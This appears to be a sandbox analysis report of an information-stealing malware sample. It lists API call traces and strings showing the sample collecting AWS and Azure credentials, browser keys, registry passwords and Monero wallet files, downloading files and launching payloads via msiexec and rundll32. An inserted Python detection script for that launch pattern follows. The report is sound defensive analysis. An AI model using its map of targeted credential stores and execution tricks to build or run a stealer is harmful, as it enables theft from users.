                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00ED4E59
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00ED4EE5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49B0
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE08D2), ref: 00ED49C5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49E2
                                  • Part of subcall function 00ED4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00ED4A1E
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00DAE9E0), ref: 00ED4A4A
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FF8), ref: 00ED4A5C
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A70
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FFC), ref: 00ED4A82
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A96
                                  • Part of subcall function 00ED4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00ED4AAC
                                  • Part of subcall function 00ED4910: DeleteFileA.KERNEL32(?), ref: 00ED4B31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: cd013fbc4a60762cb6f933c5af67d9f79817d334656ba70853ec3962a282488a
                                • Instruction ID: f8130aaaf01aa5e57832b5a3d58e40f74e72109ccb22a4aac067e7b078159141
                                • Opcode Fuzzy Hash: cd013fbc4a60762cb6f933c5af67d9f79817d334656ba70853ec3962a282488a
                                • Instruction Fuzzy Hash: 4E41AFBA94030867CB64E770EC47FDD3678AB64700F0054A5B589761C2EEF59BCA8B92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED906C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction ID: fed37d08e9ca6a097c4e21ee18005ed1984b36c4592e905516235c0edcd39c0e
                                • Opcode Fuzzy Hash: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction Fuzzy Hash: 3771ED75D10208ABDB18DBE4ED89FEEB7B8FF48300F108519F516A7284DB75A945CB60
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction ID: ec3daabb3cc6a394333b299ec62dc525e10d136d909461e1f71274cbc2a073a9
                                • Opcode Fuzzy Hash: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction Fuzzy Hash: 66123E768001089ADB19EBA0DD96FEDB7B8EF54300F44516AF50676291EF702B4BCF62
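The record above is the point where the sample hands a file it has written to a signed Windows binary: the String IDs (`/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe`, `C:\Windows\system32\rundll32.exe`) are the pieces of a `msiexec.exe /i "<file>.msi" /passive` or `rundll32.exe <file>.dll` command line, and the three ShellExecuteEx calls run it. The following is an added detection example, not part of the Joe Sandbox report: it scans constructed process-creation events for that hand-off. The events, the path list and the heuristic (package or DLL under a user-writable path, launched by a parent that itself lives under a user-writable path) are the author's assumptions about what separates this pattern from a normal install, and the `Start` export name in the rundll32 event is a placeholder, since the report does not show the export the sample uses.

```python
"""Flag the msiexec / rundll32 hand-off implied by the strings above (`/i "`,
` /passive`, `.msi`, `.dll`, the two system32 paths) in process-creation events.

Added detection example, not part of the report. The events are constructed and
the heuristic (package or DLL under a user-writable path, parent image also
under a user-writable path) is the author's assumption about what separates
this hand-off from a normal install; tune USER_WRITABLE to your estate.
"""
import re
from pathlib import PureWindowsPath

ARG = re.compile(r'"([^"]*)"|(\S+)')
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")  # assumption


def split_cmdline(cmdline):
    """Windows-style split: a double-quoted run is one argument, quotes dropped."""
    return [quoted or plain for quoted, plain in ARG.findall(cmdline)]


def is_user_writable(path):
    return any(mark in path.lower() for mark in USER_WRITABLE)


def check_event(ev):
    """Return the rule an event trips, or None. Keys: image, cmdline, parent_image."""
    argv = split_cmdline(ev["cmdline"])
    image = PureWindowsPath(ev["image"]).name.lower()
    if not is_user_writable(ev["parent_image"]):
        return None  # explorer.exe, deployment agents etc. are outside this pattern
    if image == "msiexec.exe":
        flags = [a.lower() for a in argv[1:]]
        idx = next((i for i, a in enumerate(flags) if a in ("/i", "-i")), None)
        if idx is not None and idx + 1 < len(flags):
            pkg = argv[1:][idx + 1]  # the package path follows /i
            if pkg.lower().endswith(".msi") and is_user_writable(pkg):
                return "msiexec_install_from_user_writable_path"
    elif image == "rundll32.exe" and len(argv) > 1:
        dll = argv[1].split(",", 1)[0]  # "<dll>,<export>"; export is optional
        if dll.lower().endswith(".dll") and is_user_writable(dll):
            return "rundll32_dll_from_user_writable_path"
    return None


def scan(events):
    """[(pid, rule)] for every event that trips a rule."""
    hits = []
    for ev in events:
        rule = check_event(ev)
        if rule:
            hits.append((ev["pid"], rule))
    return hits


SAMPLE_EVENTS = [  # constructed, modelled on the command-line pieces in the record above
    {"pid": 4120, "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\setup.msi" /passive',
     "parent_image": r"C:\Users\victim\Downloads\file.exe"},
    {"pid": 4188, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Users\victim\AppData\Roaming\plugin.dll,Start",
     "parent_image": r"C:\Users\victim\Downloads\file.exe"},
    {"pid": 5012, "image": r"C:\Windows\system32\msiexec.exe",  # user double-clicked an installer
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\Downloads\vendor-setup.msi"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5090, "image": r"C:\Windows\system32\rundll32.exe",  # system DLL, benign
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
     "parent_image": r"C:\Users\victim\AppData\Local\Programs\app\app.exe"},
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-path condition does the real work: msiexec with `/passive` and a package in `%TEMP%` is also what a user-initiated installer looks like, so the rule only fires when the launching process is itself an unprivileged drop such as the `file.exe` analysed here. Feed it Sysmon event ID 1 or Windows 4688 records mapped to the three keys and add `/quiet` and `/qn` to the flag check if your estate sees those variants.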
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                • lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                • lstrlen.KERNEL32(00000000), ref: 00ED5383
                                • lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: a539adb6806e32b4638bc4525c910b619f7db3046454fa0eb058f2791766a495
                                • Instruction ID: 270dc17725152ca0a3f2ff9a25d1b5fe76194a9172e9af233b63557c18a0ebac
                                • Opcode Fuzzy Hash: a539adb6806e32b4638bc4525c910b619f7db3046454fa0eb058f2791766a495
                                • Instruction Fuzzy Hash: F1511B359101489BCB18FF64D996AED77B9EF10300F54602AF8067A292EF346B47DB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 4fe025df4a503ba493b3ff219a23ddb2d2382614739a7170f5faa8f9f507d47e
                                • Instruction ID: e94da6fe545e0db396007c66dec42d9c3e4d006efba68ec57ffa2f92e14bf5b3
                                • Opcode Fuzzy Hash: 4fe025df4a503ba493b3ff219a23ddb2d2382614739a7170f5faa8f9f507d47e
                                • Instruction Fuzzy Hash: 22C196B5D002199BCB18EF60DC89FDA73B8FF54304F0455AAF50A77241EA70AA86CF91
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED42EC
                                • lstrcat.KERNEL32(?,00DAE0D0), ref: 00ED430B
                                • lstrcat.KERNEL32(?,?), ref: 00ED431F
                                • lstrcat.KERNEL32(?,00DAD420), ref: 00ED4333
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00EC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED93C0: GlobalAlloc.KERNEL32(00000000,00ED43DD,00ED43DD), ref: 00ED93D3
                                • StrStrA.SHLWAPI(?,00DAE280), ref: 00ED43F3
                                • GlobalFree.KERNEL32(?), ref: 00ED4512
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED44A3
                                • StrCmpCA.SHLWAPI(?,00EE08D1), ref: 00ED44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00ED44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00ED44E5
                                • lstrcat.KERNEL32(00000000,00EE0FB8), ref: 00ED44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: be795442152d1f0766032755ad620bd717835f9d25826021096abb060fab7cfe
                                • Instruction ID: eddd3d649d327941bf24f182413f48b2689a57455c5261925aa95fded5dd8aef
                                • Opcode Fuzzy Hash: be795442152d1f0766032755ad620bd717835f9d25826021096abb060fab7cfe
                                • Instruction Fuzzy Hash: B37178B6D00208ABCB14FBA0EC85FEE73B9BF48300F045599F515A7181EA75DB56CB91
                                APIs
                                  • Part of subcall function 00EC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                  • Part of subcall function 00EC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                  • Part of subcall function 00EC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                  • Part of subcall function 00EC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                  • Part of subcall function 00EC12A0: RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EC134F
                                • lstrlen.KERNEL32(?), ref: 00EC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EC1377
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EC1465
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: e87f93ef8b75be0cd22cec3adeeba411357de0021842d0d2281cdfea1870f8d8
                                • Instruction ID: a864373b801ab07863ac24c9c6d3a338ce40dd81775a3a2d2e8dd2b880be44c9
                                • Opcode Fuzzy Hash: e87f93ef8b75be0cd22cec3adeeba411357de0021842d0d2281cdfea1870f8d8
                                • Instruction Fuzzy Hash: 175175B2D102185BCB19EB60DD96FED73BCEF50300F4451B9B60A72182EE705B86CB95
                                APIs
                                  • Part of subcall function 00EC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                  • Part of subcall function 00EC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                  • Part of subcall function 00EC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                  • Part of subcall function 00EC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                  • Part of subcall function 00EC72D0: HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • lstrcat.KERNEL32(00000000,00EE17FC), ref: 00EC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC768F
                                • lstrcat.KERNEL32(00000000,00EE1804), ref: 00EC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC76D3
                                • lstrcat.KERNEL32(00000000,00EE1808), ref: 00EC76ED
                                • task.LIBCPMTD ref: 00EC76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction ID: c0a799a38b44c012a6b0c8bd4e4b53906d9b268a07007b2f52af7c2a423af6fe
                                • Opcode Fuzzy Hash: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction Fuzzy Hash: 74314F72D00209DFCB19EBA4EE45EEE77B4BF48301B10512DF112B7284DA75AA87CB50
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                • InternetOpenA.WININET(00EE0DF7,00000001,00000000,00000000,00000000), ref: 00EC610F
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EC6249
                                • InternetCloseHandle.WININET(?), ref: 00EC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction ID: e0911f4c0bf2d9b16d8feea643ebae9d7aa14b3143bd26ce22822ad91371458d
                                • Opcode Fuzzy Hash: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction Fuzzy Hash: AB5180B1900218ABDB24DF50DD49FEE77B8EF44305F1090A9B605B72C0DBB66A86CF95
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                • HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • task.LIBCPMTD ref: 00EC7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction ID: 703c6d87661752b6833fd219ebc6f3ac215aeb7cb548615c18adbfcf05a515d4
                                • Opcode Fuzzy Hash: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction Fuzzy Hash: 87614CB590425C9BDB24DB50DE45FDAB7B8BF44300F0091E9E689B6141DBB15BCACF90
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00ECBC9F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ECBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
